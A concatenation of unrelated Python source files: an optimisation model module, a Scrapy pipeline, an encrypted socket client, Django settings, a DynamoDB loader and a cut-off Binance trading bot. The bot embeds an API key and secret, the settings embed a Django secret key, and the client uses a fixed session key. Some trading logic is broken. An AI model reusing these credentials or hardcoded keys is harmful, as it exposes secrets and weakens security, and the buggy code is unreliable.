perturbations.append(perturbation_amount)\n perturbation_amount = (perturbation_amount.reshape(vecs_count, -1)*search_radiuses[:, None]).reshape(\n perturbation_amount.shape)\n\n new_params.append(torch.cat((stacked_parameter + perturbation_amount,\n stacked_parameter - perturbation_amount), dim = 0))\n return perturbations, new_params \n \n def compute_grad_zeroth_order_delta(self, Xb, yb, v):\n ## Perform local search\n search_radiuses = torch.ones(self.random_vecs, device=self.device)*v #\n perturbations, new_params = self.perturb(search_radiuses=search_radiuses)\n grad, loss = self.compute_average_grad(Xb, yb, perturbations, new_params, search_radiuses)\n return grad, loss \n \n def compute_grad(self, Xb, yb, **kwargs):\n if self.grad_mode in 'zeroth order delta':\n lr = kwargs.get('lr', None)\n v = lr / (self.dim + 6)\n grad, loss = self.compute_grad_zeroth_order_delta(Xb, yb, v)\n elif self.grad_mode in ['first order', 'zeroth order forward-mode AD']:\n grad, loss = super().compute_grad(Xb, yb)\n \n return grad, loss\n \n def compute_average_grad(self, Xb, yb, perturbations, new_params, search_radiuses):\n vecs_count = perturbations[0].shape[0]\n with torch.no_grad():\n X = self.batch_forward(Xb, new_params, vecs_count)\n \n losses = self.vector_batch_loss(X, yb)\n ratios = torch.div((losses[0:vecs_count] - losses[vecs_count:2*vecs_count]), 2*search_radiuses)\n avg_loss = torch.mean(losses)\n grads = []\n for u, param in zip(perturbations, self.parameters()):\n u = one_three_multiplication(ratios, u)\n mean_u = torch.mean(u, 0)\n grad = torch.t(mean_u)\n grads.append(grad.flatten())\n return torch.cat(grads), avg_loss\n \n def batch_forward(self, Xb, new_params, vecs_count):\n batch_size = len(Xb)\n# if self.dataset_name == \"mnsit\":\n# X = Xb.view(Xb.size(0), -1)\n# X = X.repeat(vecs_count*2, 1, 1)\n# X = torch.bmm(X, new_params[0])\n# X += new_params[1].unsqueeze(1).repeat(1, batch_size, 1)\n# X = F.relu(X)\n# X = torch.bmm(X, new_params[2])\n# X += new_params[3].unsqueeze(1).repeat(1, batch_size, 1)\n# elif self.dataset_name == \"year_pred\": ## Todo change this!\n# X = Xb.view(Xb.size(0), -1)\n X = Xb.repeat(vecs_count*2, 1, 1)\n X = torch.bmm(X, new_params[0])\n X += new_params[1].unsqueeze(1).repeat(1, batch_size, 1)\n return X \n \n def vector_batch_loss(self, X, y):\n X_shape = X.shape\n independent_vecs = X_shape[0]\n batch_size = 
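The perturb / compute_average_grad pair above implements a two-sided, derivative-free estimator: the loss is evaluated at theta + r*u and theta - r*u for random directions u, and ((f+ - f-) / (2r)) * u is averaged. A minimal numpy sketch of the same idea (an assumption, kept scalar for clarity):

import numpy as np

def two_point_grad(f, theta, n_vecs=500, radius=1e-3, seed=0):
    # Central-difference estimate of grad f(theta) along random directions.
    rng = np.random.default_rng(seed)
    u = rng.standard_normal((n_vecs, theta.size))
    f_plus = np.array([f(theta + radius * d) for d in u])
    f_minus = np.array([f(theta - radius * d) for d in u])
    ratios = (f_plus - f_minus) / (2.0 * radius)
    return (ratios[:, None] * u).mean(axis=0)

f = lambda t: (t ** 2).sum()          # true gradient is 2 * theta
theta = np.array([1.0, -3.0])
print(two_point_grad(f, theta))       # approximately [2.0, -6.0]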
X_shape[1]\n if(self.dataset_name == \"year_pred\"):\n reshape = (-1, )\n y = y.flatten()\n else:\n reshape = (-1, X_shape[2])\n X_2d = torch.reshape(X, reshape)\n y_repeated = y.repeat(independent_vecs)\n losses = self.criterion_non_reduce(X_2d, y_repeated)\n losses = losses.reshape(independent_vecs, batch_size)\n losses = torch.mean(losses, 1)\n return losses\n\ndef get_temp_state_dict(dataset_name):\n assert dataset_name in DATASETS\n \n if dataset_name in EXTRACTED_DATASETS + ['year_pred']:\n in_out_dim = get_in_out_shape(dataset_name)\n model = LinearEnhancedModel(in_out_dim=in_out_dim, grad_mode='temp', criterion=None)\n elif dataset_name == \"fmnist\":\n model = FashionMnistNet(grad_mode='temp', criterion=None)\n state_dict = model.state_dict()\n return state_dict\n\nclass FashionMnistNet(EnhancedModel):\n \n def __init__(self, grad_mode, criterion, **kwargs):\n super(FashionMnistNet, self).__init__(grad_mode, criterion, **kwargs)\n \n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=32, kernel_size=3, padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n \n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n \n self.fc1 = nn.Linear(in_features=64*6*6, out_features=600)\n self.drop = nn.Dropout2d(0.25)\n self.fc2 = nn.Linear(in_features=600, out_features=120)\n self.fc3 = nn.Linear(in_features=120, out_features=10)\n self.to(self.device)\n \n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n out = self.fc1(out)\n out = self.drop(out)\n out = self.fc2(out)\n out = self.fc3(out)\n \n return out\n\ndef get_model(dataset_name, grad_mode, **kwargs):\n assert dataset_name in DATASETS\n kwargs['dataset_name'] = dataset_name\n criterion = get_criterion(dataset_name)\n if dataset_name in EXTRACTED_DATASETS:\n in_out_dim = get_in_out_shape(dataset_name)\n model = LinearEnhancedModel(in_out_dim=in_out_dim, grad_mode=grad_mode, criterion=criterion, **kwargs)\n elif dataset_name == \"year_pred\":\n in_out_dim = get_in_out_shape(dataset_name)\n model = LinearEnhancedModel(in_out_dim=in_out_dim, grad_mode=grad_mode, criterion=criterion, **kwargs)\n model.acc_def = \"in neighbourhood\"\n elif dataset_name == \"fmnist\":\n model = FashionMnistNet(grad_mode=grad_mode, criterion=criterion, **kwargs)\n return model\n\ndef get_group_models(dataset_name, group, initial_state_dict, **kwargs):\n count, grad_mode = group['count'], group['grad_mode']\n models = []\n for i in range(count):\n if 'zeroth order' in grad_mode:\n if 'random vecs' in group:\n kwargs['random vecs'] = group['random vecs']\n model = get_model(dataset_name, grad_mode, **kwargs)\n \n model.load_state_dict(initial_state_dict)\n models.append(model)\n return models","repo_name":"ShayanTalaei/Hybrid-Decentralized-Optimization","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18529609857","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport datetime\nimport alibaba\nimport pymongo\nfrom scrapy import log\nfrom scrapy.conf import settings\nfrom scrapy.exceptions import DropItem\n \n \n 
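FashionMnistNet's fc1 expects 64*6*6 inputs; a quick shape check (a sketch, not part of models.py) confirms the arithmetic: 28x28 -> conv(k=3, pad=1) keeps 28 -> maxpool(2) -> 14 -> conv(k=3, no pad) -> 12 -> maxpool(2) -> 6, with 64 channels after the second block. BatchNorm/ReLU are omitted here since they do not change shapes.

import torch
from torch import nn

layer1 = nn.Sequential(nn.Conv2d(1, 32, 3, padding=1), nn.MaxPool2d(2, 2))
layer2 = nn.Sequential(nn.Conv2d(32, 64, 3), nn.MaxPool2d(2))

x = torch.zeros(1, 1, 28, 28)         # one Fashion-MNIST sized image
out = layer2(layer1(x))
print(out.shape)                      # torch.Size([1, 64, 6, 6])
print(out.flatten(1).shape[1])        # 2304 == 64 * 6 * 6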
#db.shop.ensureIndex({\"url\":1},{\"unique\":true,\"dropDups\":true})\n\nclass MongoDBPipeline(object):\n def __init__(self):\n self.server = settings['MONGODB_SERVER']\n self.port = settings['MONGODB_PORT']\n self.db = settings['MONGODB_DB']\n #self.col = settings['MONGODB_COLLECTION']\n connection = pymongo.Connection(self.server, self.port)\n self.db = connection[self.db]\n self.tables = {\"ShopItem\":\"shop\",\n 'GoodsItem':'goods',\n \"IndexItem\":'index',\n }\n \n def process_item(self, item, spider):\n err_msg = ''\n for field, data in item.items():\n if not data:\n err_msg += 'Missing %s of poem from %s\\n' % (field, item['url'])\n if err_msg:\n raise DropItem(err_msg)\n \n collection = self.db[self.tables[ item.__class__.__name__ ]]\n collection.insert(dict(item))\n # log.msg('Item written to MongoDB database %s/%s' % (self.db, collection),\n # level=log.INFO, spider=spider)\n return item\n","repo_name":"zhangzhenhu/scrapyc","sub_path":"server/projects/alibaba/alibaba/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"11899120396","text":"import queue\nimport socket\nimport threading as th\nimport utils.encryption as encryption\nimport utils.message2 as msg\nfrom utils.conf import get_path\n\n# import sky_client.utils.encryption as encryption\n# import sky_client.utils.message2 as msg\n# from sky_client.utils.conf import get_path\n\nclass MessageReceiver(th.Thread):\n def __init__(self, client, connection):\n super().__init__()\n self.daemon = True\n self.client = client\n self.socket = connection\n self.recieved_queue = queue.Queue()\n self.stop = False\n\n def run(self):\n # self.socket.settimeout(0.2)\n print('run')\n while not self.stop:\n try:\n #вставить Lock\n bl = self.socket.recv(4)\n leng = int.from_bytes(bl, 'big')\n message = b''\n left_to_read = leng\n while left_to_read != 0:\n to_read = 4096 if left_to_read > 4096 else left_to_read\n data = self.socket.recv(to_read)\n message += data\n left_to_read -= len(data)\n\n print('message recieved ok') if leng == len(message) else print('incomplete message recived')\n\n # while leng > 4096:\n # data += self.socket.recv(4096)\n # leng -= 4096\n # data += self.socket.recv(leng)\n if not message:\n break\n else:\n self.recieved_queue.put(message)\n self.client.new_message()\n except:\n pass\n\n\nclass MessageSender(th.Thread):\n def __init__(self, connection):\n super().__init__()\n self.daemon = True\n self.socket = connection\n self.send_queue = queue.Queue()\n self.stop = False\n\n def run(self):\n while not self.stop:\n if self.send_queue.not_empty:\n message = self.send_queue.get()\n # вставить Lock\n l = len(message)\n bl = l.to_bytes(4, 'big')\n self.socket.sendall(bl + message)\n\n\nclass Client:\n # инициализация клиента\n def __init__(self, host, port):\n self.server_address = (host, port)\n self.listener = None\n self.session_key_recieved_by_server = False\n self.cipher_rsa = b''\n self.authenticated = False\n\n # соединение с сервером, encryption, запуск получателя и отправителя сообщений в потоках\n def run(self, username='', password=''):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #conn\n try:\n self.socket.connect(self.server_address)\n except TimeoutError:\n print('timeout error')\n except ConnectionRefusedError:\n print('connection refused, socket problem')\n\n # encryption dialog start\n public_key_binary = self.socket.recv(1024)\n 
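The comment at the top of the pipeline hints at a unique index on shop URLs to drop duplicates. A sketch of that index with the current pymongo API (the pipeline itself targets the long-deprecated pymongo.Connection; note also that MongoDB removed the dropDups option in 3.0, so duplicates must be cleaned before the unique index can be built):

import pymongo

client = pymongo.MongoClient("localhost", 27017)   # assumed host/port
db = client["alibaba"]                             # assumed database name
db["shop"].create_index([("url", pymongo.ASCENDING)], unique=True)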
self.cipher_rsa = encryption.generate_cipher_rsa(public_key_binary)\n\n #threads start\n self.reciever_thread = MessageReceiver(self, self.socket)\n self.reciever_thread.start()\n self.sender_thread = MessageSender(self.socket)\n self.sender_thread.start()\n\n self.session_key = b'Sixteen byte key'\n self.session_key_encrypted = encryption.generate_session_key(self.cipher_rsa, self.session_key)\n\n def send_auth_data(self, auth_message):\n auth_bmessage = auth_message.get_binary_json('utf-8')\n auth_message_encrypted = encryption.encrypt(auth_bmessage, self.session_key)\n self.sender_thread.send_queue.put(self.session_key_encrypted + auth_message_encrypted)\n\n def send(self, message):\n bmessage = message.get_binary_json('utf-8')\n encrypted_message = encryption.encrypt(bmessage, self.session_key)\n self.sender_thread.send_queue.put(encrypted_message)\n\n def send_file(self, encrypted_data):\n self.sender_thread.send_queue.put(encrypted_data)\n\n # разрыв соединения\n def disconnect(self):\n self.reciever_thread.stop = True\n self.sender_thread.stop = True\n self.socket.close()\n self.session_key_recieved_by_server=False\n\n def new_message(self):\n encrypted_data = self.reciever_thread.recieved_queue.get()\n if self.listener.waiting_file_flag:\n print(self.listener.file_data.name)\n file_path = get_path(self.listener.file_data.name)\n encryption.decrypt_file(encrypted_data, self.session_key, file_path)\n self.listener.new_file_recieved(file_path)\n else:\n bmessage = encryption.decrypt(encrypted_data, self.session_key)\n message = msg.GeneralMessage()\n message.make_from_binary_json(bmessage, 'utf-8')\n self.listener.new_message(message)\n\n\n\n","repo_name":"vsurguch/client","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12469443435","text":"from .base import *\n# from .secrets import *\n\n# GENERAL\n# ------------------------------------------------------------------------------\n# Configure the domain name using the environment variable\n# that Azure automatically creates for us.\nDEBUG = True\nALLOWED_HOSTS = ['127.0.0.1']\nSECRET_KEY = 'django-insecure-3%xzde#z7j5bx4m&m-7o050@e=$udh9xc_zz^g10-ecw9swi4w'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\nINSTALLED_APPS = ['livereload'] + INSTALLED_APPS\nMIDDLEWARE = MIDDLEWARE + ['livereload.middleware.LiveReloadScript']\n","repo_name":"NightingaleV/sweeper-swift-parsing-web-app","sub_path":"settings/config/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34191698991","text":"#!/usr/bin python3\r\n\r\nimport sys\r\nimport boto3\r\n\r\ndynamo = boto3.resource('dynamodb')\r\n\r\n\r\ndef no_quotes(s):\r\n return s.replace('\"', '')\r\n\r\n\r\ndef buildkey(data):\r\n parts = data.split(',')\r\n date = no_quotes(parts[0])\r\n home_team = no_quotes(parts[6])\r\n game_number = no_quotes(parts[1])\r\n return home_team + date + game_number\r\n\r\n\r\ndef load_file(path):\r\n table = dynamo.Table('diamond')\r\n with open(path) as gamelogs:\r\n for gamelog in gamelogs:\r\n log_row = {}\r\n log_row['item_key'] = \"game\"\r\n log_row['item_name'] = buildkey(gamelog)\r\n log_row['log'] = no_quotes(gamelog)\r\n table.put_item(Item=log_row)\r\n print(log_row['item_name'] + \":\" + 
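MessageSender and MessageReceiver frame every message with a 4-byte big-endian length header. A standalone sketch of that protocol (assumed helpers, not from client.py); unlike the receiver above, recv_exact also loops on the header read, since socket.recv(4) may legally return fewer than 4 bytes:

import socket

def send_framed(sock: socket.socket, payload: bytes) -> None:
    # Length prefix first, then the payload, in one sendall call.
    sock.sendall(len(payload).to_bytes(4, "big") + payload)

def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("socket closed mid-frame")
        buf += chunk
    return buf

def recv_framed(sock: socket.socket) -> bytes:
    length = int.from_bytes(recv_exact(sock, 4), "big")
    return recv_exact(sock, length)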
log_row['log'])\r\n\r\n\r\ndef main():\r\n path = sys.argv[1]\r\n load_file(path)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"leemcknight/diamond","sub_path":"scripts/dynamodb/gamelog.py","file_name":"gamelog.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31426077796","text":"import math\nimport time\nimport logging\nimport numpy as np\nimport pandas as pd\nimport pandas_ta as ta\nfrom binance.client import Client\n\n# All necessary plotly libraries\nimport plotly as plotly\nimport plotly.io as plotly\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\nfrom BinanceBot.reinforcement_learning_stock import StockTradingEnv\n\napi_key = 'hPZcl6C7b1NFfMNc2whnh2OSyxsWxyEIEP2mKDypUYDrG70eeB4rniELcx0KnAwD'\napi_secret = 'tF6fS7kskVztUbDA5jkXt8GAdXLoJ82C9BaspK0F9AbV2MuG2aGZOcLoboOOUgX6'\n\ncol = ['open_time', 'open', 'high', 'low', 'close',\n 'volume', 'close_time', 'quote_asset_volume',\n 'number_of_trades', 'taker_buy_base_asset_volume',\n 'taker_buy_quote_asset_volume', 'ignore']\n\nclient = Client(api_key, api_secret, testnet=True)\n\n\ndef preprossing(df, sma_short=5, sma_long=20, ema_short=5, ema_long=20, rsi_period=14, difference=1e-4):\n df = df.copy(deep=True)\n\n df['sma_short'] = df.ta.sma(length=sma_short)\n df['sma_long'] = df.ta.sma(length=sma_long)\n\n df['ema_short'] = df.ta.ema(length=ema_short)\n df['ema_long'] = df.ta.ema(length=ema_long)\n\n df['rsi'] = df.ta.rsi(length=rsi_period)\n\n df['single_rsi'] = df['rsi'].apply(lambda x: 1 if x < 30 else 0 if x >= 70 else -1)\n\n df['single_sma'] = ((df['sma_short'] - difference) > df['sma_long']).astype(int)\n df['single_ema'] = ((df['ema_short']) > df['ema_long']).astype(int)\n\n df['double_sma'] = (df['sma_short'] > df['sma_long']).astype(int).diff()\n\n adx = df.ta.adx(length=14, high='high', low='low', close='close')\n df['single_dmp'] = (adx['DMN_14'] > adx['DMP_14']).astype(int)\n\n required_col = ['open', 'high', 'low', 'close', 'volume', 'sma_short',\n 'sma_long', 'ema_short', 'ema_long', 'rsi', 'single_sma',\n 'single_ema', 'double_sma', 'single_dmp', 'single_rsi']\n # required_col = ['open', 'high', 'low', 'close', 'volume', 'rsi', 'single_sma', 'single_ema']\n\n return df[required_col]\n\n\ndef get_data(symbol, interval, sma_short=5, sma_long=20, ema_short=5, ema_long=20, rsi_period=14, limit=None):\n if sma_short > sma_long:\n print(\"sma_short must be smaller than sma_long\")\n return None\n\n if ema_short > ema_long:\n print(\"ema_short must be smaller than ema_long\")\n return None\n\n if rsi_period < 1:\n print(\"rsi_period must be greater than 1\")\n return None\n\n limit = limit if limit is not None else sma_long if sma_long > ema_long else ema_long\n\n col = ['open_time', 'open', 'high', 'low', 'close',\n 'volume', 'close_time', 'quote_asset_volume',\n 'number_of_trades', 'taker_buy_base_asset_volume',\n 'taker_buy_quote_asset_volume', 'ignore']\n\n df = pd.DataFrame(client.get_klines(symbol=symbol, interval=interval, limit=limit), columns=col)\n\n df['open_time'] = pd.to_datetime(df['open_time'], unit='ms')\n df['close_time'] = pd.to_datetime(df['close_time'], unit='ms')\n df = df.set_index('open_time')\n df = df.drop(columns=['close_time', 'ignore'])\n df = df.astype(float)\n\n df = preprossing(df)\n\n return df\n\ndef get_klines(symbol, interval, 
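load_file issues one put_item request per game log row. A throughput-oriented variant (a sketch reusing the buildkey/no_quotes helpers defined earlier in that file): boto3's batch_writer groups puts into BatchWriteItem requests and retries unprocessed items automatically.

import boto3

def load_file_batched(path):
    table = boto3.resource("dynamodb").Table("diamond")
    with table.batch_writer() as batch, open(path) as gamelogs:
        for gamelog in gamelogs:
            batch.put_item(Item={
                "item_key": "game",
                "item_name": buildkey(gamelog),
                "log": no_quotes(gamelog),
            })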
start, end,limit=1000):\n col = ['open_time', 'open', 'high', 'low', 'close',\n 'volume', 'close_time', 'quote_asset_volume',\n 'number_of_trades', 'taker_buy_base_asset_volume',\n 'taker_buy_quote_asset_volume', 'ignore']\n\n d = []\n for klines in client.get_historical_klines_generator(symbol, interval, start_str=start, end_str=end, limit=limit):\n d.append(klines)\n df = pd.DataFrame(d, columns=col)\n df['open_time'] = pd.to_datetime(df['open_time'], unit='ms')\n df['close_time'] = pd.to_datetime(df['close_time'], unit='ms')\n df['open'] = np.float64(df['open'])\n df['close'] = np.float64(df['close'])\n df['volume'] = np.float64(df['volume'])\n\n df = df.set_index('open_time')\n\n return df\n\ndef get_min_qty(symbol, multiplier=1):\n info = client.get_symbol_info(symbol)\n ticker = client.get_ticker(symbol=symbol)\n filters = pd.DataFrame(info.get('filters'))\n min_lot_size = float(filters[filters.filterType == 'LOT_SIZE']['minQty'].values[0])\n min_step_size = float(filters[filters.filterType == 'LOT_SIZE']['stepSize'].values[0])\n min_notional = float(filters[filters.filterType == 'MIN_NOTIONAL']['minNotional'].values[0])\n current_price = float(ticker['lastPrice'])\n\n qty = min_notional / current_price\n qty = math.ceil(qty)\n return qty * multiplier\n\n\ndef get_cash(asset):\n info = client.get_asset_balance(asset=asset)\n return float(info['free'])\n\n\ndef order(symbol, qty, type):\n try:\n if type.lower() == 'buy'.lower() or type.lower() == 'b'.lower():\n order = client.order_market_buy(symbol=symbol, quantity=qty)\n\n elif type.lower() == 'sell'.lower() or type.lower() == 's'.lower():\n order = client.order_market_sell(symbol=symbol, quantity=qty)\n else:\n print(\"Wrong order type\")\n return None\n return order\n except Exception as e:\n print(e)\n return None\n\n\ndef bot_binance_signel(df, symbol, asset_1, asset_2, stop_loss, take_profit, print_action, is_bought, profit,\n last_bought_price, last_max_value, multiplier=1):\n sma_single = df.single_sma[0]\n ema_single = df.single_ema[0]\n rsi = df.rsi[0]\n close_price = df.close[0]\n asset_1_cash = get_cash(asset_1)\n asset_2_cash = get_cash(asset_2)\n min_qty = get_min_qty(symbol,multiplier)\n # open_price = df['open'].values\n # high_price = df['high'].values\n # low_price = df['low'].values\n # volume = df['volume'].values\n\n if not is_bought and sma_single == 1 : # and ema_single == 1:\n if asset_1_cash > close_price: # check if you have money\n\n is_order_placed = order(symbol, min_qty, 'buy') # place Buy Order\n if is_order_placed is not None:\n is_bought = True\n last_bought_price = close_price # set bought price\n last_max_value = close_price # max price since bought, used for dynamic stop loss\n if print_action:\n print_and_log(f\"\"\"buy {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy\", close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"buy order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy order failed\",close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Close Price: {close_price}, {asset_1}: {asset_1_cash} \"\"\")\n # print(\"not enough cash to buy\")\n\n elif is_bought and sma_single == 0: # and ema_single == 0 : # normal Sell\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n if close_price < (last_max_value * (1 - stop_loss)) or close_price > (\n 
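get_min_qty derives a quantity from MIN_NOTIONAL / price and rounds up with math.ceil, but it never aligns the result to the LOT_SIZE stepSize it reads; Binance rejects quantities that are not a multiple of stepSize. A sketch of the alignment step (an assumption, not part of the bot):

import math

def align_qty(raw_qty: float, min_qty: float, step_size: float) -> float:
    # Round *up* to the next stepSize multiple so the notional
    # requirement still holds; 8 decimals is a common Binance cap.
    qty = max(raw_qty, min_qty)
    steps = math.ceil(qty / step_size)
    return round(steps * step_size, 8)

print(align_qty(0.1234, 0.001, 0.001))   # 0.124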
last_bought_price * (1 + take_profit)):\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n elif is_bought and \\\n (close_price < (last_max_value * (1 - stop_loss)) or\n close_price > (last_bought_price * (1 + take_profit))): # Emergencey Sell Stop Loss / Take Profit\n\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Min QTY: {min_qty}, {asset_1}: {asset_2_cash} \"\"\")\n # print(\"not enough cash to sell\")\n\n return profit, is_bought, last_max_value, last_bought_price\n\n\ndef bot_binance_rl(df, symbol, asset_1, asset_2, stop_loss, take_profit, print_action, is_bought, profit,\n last_bought_price, last_max_value, multiplier=1):\n sma_single = df.single_sma[0]\n ema_single = df.single_ema[0]\n rsi = df.rsi[0]\n close_price = df.close[0]\n asset_1_cash = get_cash(asset_1)\n asset_2_cash = get_cash(asset_2)\n min_qty = get_min_qty(symbol,multiplier)\n\n\n\n\n action = 0\n\n if not is_bought and action == str(1) : # buy\n if asset_1_cash > close_price: # check if you have money\n\n is_order_placed = order(symbol, min_qty, 'buy') # place Buy Order\n if is_order_placed is not None:\n is_bought = True\n last_bought_price = close_price # set bought price\n last_max_value = close_price # max price since bought, used for dynamic stop loss\n if print_action:\n print_and_log(f\"\"\"buy {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy\", close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"buy order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy order failed\",close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Close Price: {close_price}, {asset_1}: {asset_1_cash} \"\"\")\n # print(\"not enough cash to buy\")\n\n elif is_bought and action == str(-1): # normal Sell\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n if close_price < (last_max_value * (1 - stop_loss)) or close_price > (\n last_bought_price * (1 + take_profit)):\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit 
+= value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n elif is_bought and \\\n (close_price < (last_max_value * (1 - stop_loss)) or\n close_price > (last_bought_price * (1 + take_profit))): # Emergencey Sell Stop Loss / Take Profit\n\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Min QTY: {min_qty}, {asset_1}: {asset_2_cash} \"\"\")\n # print(\"not enough cash to sell\")\n\n return profit, is_bought, last_max_value, last_bought_price\n\n\ndef run(symbol, asset_1, asset_2, interval='1m',\n sma_short=5, sma_long=20, ema_short=5, ema_long=20, rsi_period=14,\n stop_loss=0.001, take_profit=0.2, print_action=True, is_bought=False,\n profit=0, last_bought_price=-1, last_max_value=-1, multiplier=1, ):\n\n limit = sma_long if sma_long > ema_long else ema_long\n\n df = get_data(symbol, interval, sma_short=sma_short, sma_long=sma_long, ema_short=ema_short, ema_long=ema_long,\n rsi_period=rsi_period)[-limit:]\n\n\n # is_load = True\n # path = 'qtable.csv'\n # env = StockTradingEnv(df, possible_values, action_space, signal_column, is_load, path)\n\n\n last_open_time = df.index[-1]\n while True:\n df = get_data(symbol, interval, sma_short=sma_short, sma_long=sma_long, ema_short=ema_short, ema_long=ema_long,\n rsi_period=rsi_period)[-1:]\n\n if df.index[-1] > last_open_time:\n last_open_time = df.index[-1]\n close_price = df.close[-1]\n profit, is_bought, last_max_value, last_bought_price = bot_binance_signel(df, symbol, asset_1, asset_2, stop_loss,\n take_profit, print_action, is_bought,\n profit, last_bought_price,\n last_max_value, multiplier=multiplier)\n\n print_and_log(f\"\"\"price: {close_price}, profit: {profit}, {asset_1}: {get_cash(asset_1)}, {asset_2}: {get_cash(asset_1)}, DateTime: {last_open_time}\"\"\")\n\n time.sleep(5)\n\ndef print_and_log(message):\n print(message)\n logging.info(message)\n\n\ndef plot_order_stocks(df, symbol, fig):\n fig = go.Figure()\n order_df = pd.DataFrame(client.get_all_orders(symbol=symbol, limit=15))\n order_df['time'] = pd.to_datetime(order_df['time'], unit='ms')\n order_df['updateTime'] = pd.to_datetime(order_df['updateTime'], unit='ms')\n order_df['price_'] = np.float64(order_df.cummulativeQuoteQty) / np.float64(order_df.origQty)\n buy_orders = order_df[order_df.side == 'BUY']\n sell_orders = order_df[order_df.side == 'SELL']\n\n fig.update_traces(go.Scatter(x=df.index, y=df.close, name='Close Price'))\n fig.add_trace(go.Scatter(x=buy_orders.time, y=buy_orders.price_, mode='markers', 
